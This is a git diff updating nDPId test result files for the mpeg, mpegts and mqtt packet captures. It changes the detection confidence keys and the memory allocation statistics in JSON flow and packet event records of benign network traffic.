memory freed........: 6007139 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2405 chars diff --git a/test/results/mpeg.pcap.out b/test/results/mpeg.pcap.out index 19073827c..0ed7b42f1 100644 --- a/test/results/mpeg.pcap.out +++ b/test/results/mpeg.pcap.out 
@@ -4,9 +4,9 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} 
-00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} 
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} 
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":9363,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434379491221} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870052 bytes -~~ total memory freed........: 5870052 bytes -~~ total allocations/frees...: 118136/118136 +~~ total memory allocated....: 6003686 bytes +~~ total memory freed........: 6003686 bytes +~~ total allocations/frees...: 120898/120898 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 800 chars diff --git a/test/results/mpegts.pcap.out b/test/results/mpegts.pcap.out index 04d5e9301..7bc31e0b2 100644 --- a/test/results/mpegts.pcap.out +++ b/test/results/mpegts.pcap.out 
@@ -2,8 +2,8 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1435209297954} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1435209297954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1362,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1362,"pkt_l4_len":1324,"thread_ts_msec":1435209297954,"pkt":"AQBeSMkXrPHfGMSBgQANHwgARQAFQAAAQAAHEaScCgEQMObIyRefIQTSBSxl6UcBARcAD7wd249nI5BqMCydEQCD1YeFyAwoYGMeHIwcYCWAHEkET\/taR\/5YANOTSagKaodBkABeSU4ooP2cAgISCfI7GswCLhYGUDAuoQXALotIDoDAaSxnQetyw1wSf\/AKkMmAETWkokF4lgj\/+lAZSgnOA6QAiGVAYA8goTB50WWTRpqMHIxOOJ8\/G9fR\/gRwAyKEkesyBkAB8oyaCwrrgKE0mAZ74p+4IoA5RfCyWS8HBk6egclHP3xARwEBGEEXVAcUcasfHBwWuxBEA0AR3\/itnAslgP4YRyyuCUAHIGOdlcBl0VAUgAPrJ4fANDAD4iy\/w8TBHHBQGqzAH4UZAHtGCiNQgPA1JISSwngX6AHm4Jf\/mKVIQhIaSD8CMAMGBoJf\/aEdACJNQ4OIkGi0bLH9Meczk8i+AAAAAQ4ShEUQIiWUxLGqxZhYCkaHcmBJHgFBLPZRvGhAjlBpCLwBHUOLiXyWkJ41IhP4BH1T\/uSXFhIJn\/tHAQEZ0kepcDEADUYFzAA1cjMHnioWBMyEDwGRt7NwM5CBuOLJQCnAKi98MAR7oiygHZNJiEoKSG4lmBgaTAxKQSf+iYWQguoQIAGwERxFmI3UAusNyXAUqSlbJ5X4WGOUAQUpObs+A8kBs4JQAaEE6oSWAdQMP\/9ghf9DiGSh5LAYDApaSdFFANnYrBjoHYtBPLLKRUBQDgP0DT\/\/ORgDyJQaGBg0vAKAK8BxyZ0AZ4JIBBDDOFjeKiGBUEcBARooBUCpMQWTeQxgYA46QHYBoSgCIhAOgHYCcAhDKgLuTwFgEYGcAGAZAG8AmQkA1JqS0AOwG5KwBKBQAa\/Alf+AOvwSQA\/sLgKAB+GoBCAGJrko0b0gVRwSf9QHYDoNQCQAIMqMFwDWAfgQnBg\/\/mSg85hwCgAiQkoDIXkxWGAeSTGBGAFG4YCT\/6WQ+AQpqEegNiL\/GrDRqRZackiI5OrlAZ43r4E0jenh7oKAIKjCCsBbeNw5Yo42RwEBGwAfQcAcRNBC\/5Z3JpRQI\/\/QCAlBZTk2chBKACsMQM4Iv\/Q0sAiADYCqACG5YMNXMdDDQLDOOlKiWGYBLwLsCN\/1yL7bI7FfbAAoJBHItxAyYj9CFdLCexAmGGF7vB7MBLz9L5WGDsERwDwKSQJIfcYImKe4c7uIjWFSGKP7CWSAC2zwgfUBhAEzwVP\/g6IJ5OIEAD+DAC0NAQgh\/9kMhk0B1uxSAKllJDAEQYAZFAUAQgk\/+DYh9IBHH\/8Q\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/0cf\/xD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1316,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1435209297954} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ 
~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 2722 chars diff --git a/test/results/mqtt.pcap.out b/test/results/mqtt.pcap.out index 53eaafbb6..4b29cc850 100644 --- a/test/results/mqtt.pcap.out +++ b/test/results/mqtt.pcap.out 
@@ -3,13 +3,13 @@ 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"} 
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
